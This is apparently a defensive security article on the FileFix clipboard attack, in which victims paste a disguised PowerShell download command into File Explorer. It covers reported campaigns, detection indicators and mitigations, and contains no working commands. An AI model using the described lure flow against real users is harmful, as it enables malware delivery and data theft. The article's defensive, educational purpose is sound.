Cyber criminals keep getting clever. FileFix is a new social engineering trick that builds on earlier clipboard attacks but uses Windows File Explorer as its execution vector. Over the last few months security teams have seen this technique move from proof of concept to real world abuse, with multiple threat groups using it to deliver remote access tools and information stealers.

What is FileFix in plain english

FileFix tricks a user into copying and pasting what looks like a normal file path into the address bar of File Explorer. The pasted text is not a path. It contains a concealed command that runs code on the machine, most commonly a PowerShell command that downloads and executes malware. Because the action happens inside trusted operating system interfaces there is often no obvious security alert and some endpoint defenses can miss it.

How this developed and why it matters now

Security researchers first demonstrated the basic idea earlier in 2025 and called it a proof of concept. Since then attackers have adapted the method and started using it in live campaigns. Multiple vendors and incident responders have published analyses showing the trick being used to deploy remote access trojans and information stealers and as a delivery method for ransomware families that use double extortion. The technique is attractive to attackers because it is purely social engineering and does not rely on a software exploit.

Recent disclosures and observed campaigns

• Check Point and several other research teams published technical write ups showing FileFix in the wild and explaining the exact copy and paste flow attackers use.
• Arctic Wolf and other incident responders reported FileFix being used to deliver Interlock remote access tools and later ransomware in targeted intrusions.
• On September 16 and 17 security outlets reported a new variant that uses image hosting sites and stenography to hide payloads and to deliver an information stealer called StealC in multilingual phishing pages. That campaign shows the technique is evolving and being combined with other evasion tactics.

Why traditional protections can miss it

FileFix does not need a malicious file to be downloaded in the normal way. The attack uses trusted UI operations like opening File Explorer and the system clipboard. That means there may be no downloadable executable for gateway or email scanning to flag, and no mark of the web metadata that some protections rely on. Detection must therefore look for the activity that follows the paste action for example unexpected PowerShell execution or network calls to odd hosts. Several defenders have published detection guides and rules you can adopt.

Quick indicators of compromise to watch for

• Unexpected popup or webpage telling you to paste a path into File Explorer.
• Unusual clipboard activity created by a webpage.
• Immediate PowerShell process creation after a paste action.
• Network calls or downloads to obscure code hosting or image hosting services right after a user action.
• Renamed or newly created scripts in temporary folders.
These signs are useful to add to detection rules and to teach security teams what to look for.

Practical steps to protect yourself and your organization

1. Train people to never copy and paste paths or code from untrusted webpages, emails, or messages. Treat any request to paste as suspicious.
2. Disable or restrict script execution where possible for users who do not need it. Use application control to prevent PowerShell from running unsigned scripts.
3. Create endpoint detection rules that look for PowerShell spawn events triggered soon after file explorer or clipboard events. Many detection teams have published analytic guides you can adapt.
4. Block known malicious domains and code repositories used by recent campaigns and monitor traffic to image hosting services used for covert payload delivery.
5. Use least privilege on endpoints and remove local admin rights from day to day users so a paste action cannot easily write or run high privilege code.

Final thoughts and what to watch next

FileFix is a reminder that the human interface and habit can be the weakest link. Attackers are moving away from noisy exploits and toward clever tricks that blend into normal user behavior. Expect to see more variants that combine clipboard tactics with stealthy payload hosting and obfuscation. Defenders should pair user education with telemetry based detection to catch the activity chain after the trick is executed. Recent reporting shows the technique is actively being used to deliver serious malware, so treating it as a real operational threat is now necessary.